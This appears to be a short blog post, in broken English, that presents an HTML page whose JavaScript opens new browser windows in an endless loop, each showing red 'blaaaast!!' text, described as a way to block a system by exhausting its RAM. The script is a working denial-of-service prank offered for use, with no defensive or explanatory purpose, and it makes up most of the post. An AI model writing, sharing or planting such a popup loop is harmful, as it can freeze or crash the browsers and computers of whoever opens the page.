The Programs May Blocks your System operations either blocking your RAM or any other device as example this code.
<html>
<body>
<script language="javascript">
while(1)
{
w1=window.open();
w1.document.write("<center><font color=red size=5> blaaaast!!</font></center>");
}
</script>
</body>
What's hurts more, the pain of hard work or the pain of regret?
0 comments:
Post a Comment